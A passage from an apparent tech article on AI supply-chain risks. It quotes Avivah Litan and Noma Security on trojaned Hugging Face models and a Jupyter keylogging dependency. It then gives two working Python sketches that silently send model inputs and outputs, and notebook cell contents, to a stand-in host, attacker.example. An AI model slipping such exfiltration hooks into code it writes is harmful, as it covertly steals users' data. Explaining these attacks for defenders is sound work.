Longtime Gartner analyst Avivah Litan (whose official title these days is Distinguished VP Analyst) recently wrote on LinkedIn about the cybersecurity dangers of these kinds of genAI efforts. Although her points were aimed at security professionals, the problems she describes are just as much a problem for IT at large.

“Enterprise AI is under the radar of most Security Operations, where staff don’t have the tools required to protect use of AI,” she wrote. “Traditional Appsec tools are inadequate when it comes to vulnerability scans for AI entities. Importantly, Security staff are often not involved in enterprise AI development and have little contact with data scientists and AI engineers. Meanwhile, attackers are busy uploading malicious models into Hugging Face, creating a new attack vector that most enterprises don’t bother to look at. 

“Noma Security reported they just detected a model a customer had downloaded that mimicked a well-known open-source LLM. The attacker had added a few lines of code to the model’s forward function. The model still worked perfectly well, so the data scientists didn’t suspect anything. But every input to the model and every output from it were also sent to the attacker, who was able to extract it all. Noma also discovered thousands of infected data science notebooks. They recently found a keylogging dependency that logged all activity in a customer’s Jupyter notebooks. The keylogger sent the captured activity to an unknown location, evading Security, which didn’t have the Jupyter notebooks in its sights.”
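To make the first attack concrete, here is a minimal sketch, in Python with PyTorch, of what such a trojaned model could look like. Every name in it (the `TrojanedModel` wrapper, the `EXFIL_URL` endpoint) is hypothetical and assumed for illustration, not taken from Noma's report; the point is only that a few added lines inside `forward()` can copy every input and output to an attacker while predictions stay correct.

```python
# Hypothetical illustration of a trojaned forward() -- not the actual malware.
import json
import urllib.request

import torch
import torch.nn as nn

EXFIL_URL = "http://attacker.example/collect"  # placeholder endpoint


class TrojanedModel(nn.Module):
    """Wraps a legitimate model; predictions are untouched."""

    def __init__(self, inner: nn.Module):
        super().__init__()
        self.inner = inner

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        y = self.inner(x)  # the normal prediction path
        try:
            # The "few lines of code": silently ship inputs and outputs
            # to a remote endpoint. Errors are swallowed, so nothing
            # ever looks broken to the data scientist.
            payload = json.dumps({"in": x.tolist(), "out": y.tolist()}).encode()
            urllib.request.urlopen(EXFIL_URL, data=payload, timeout=1)
        except Exception:
            pass
        return y


# From the user's point of view, the model works perfectly:
model = TrojanedModel(nn.Linear(4, 2))
print(model(torch.randn(1, 4)))
```

Because the exfiltration lives inside the model file itself rather than the application code, a traditional AppSec scan never sees it, which is exactly Litan's point about inadequate tooling.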
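The Jupyter keylogger needs even less machinery. One plausible mechanism, sketched below under the assumption that the malicious dependency hooks IPython's documented event system when imported (the collector URL and helper names are hypothetical), is to register a `pre_run_cell` callback that ships the source of every executed cell off-host:

```python
# Hypothetical sketch of a notebook "keylogger" dependency -- illustrative only.
import json
import urllib.request

COLLECTOR = "http://attacker.example/cells"  # placeholder endpoint


def _ship(info):
    """Forward the source of the cell about to run; never raise."""
    try:
        payload = json.dumps({"cell": info.raw_cell}).encode()
        urllib.request.urlopen(COLLECTOR, data=payload, timeout=1)
    except Exception:
        pass  # stay invisible to the notebook user


try:
    ip = get_ipython()  # defined only inside IPython/Jupyter sessions
    if ip is not None:
        # Fires before every cell execution: a complete activity log.
        ip.events.register("pre_run_cell", _ship)
except NameError:
    pass  # plain Python interpreter: do nothing
```

Because the hook rides along inside a dependency the notebook imports anyway, nothing in the user's own code changes, and a security team that isn't watching notebook environments has nothing to alert on.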


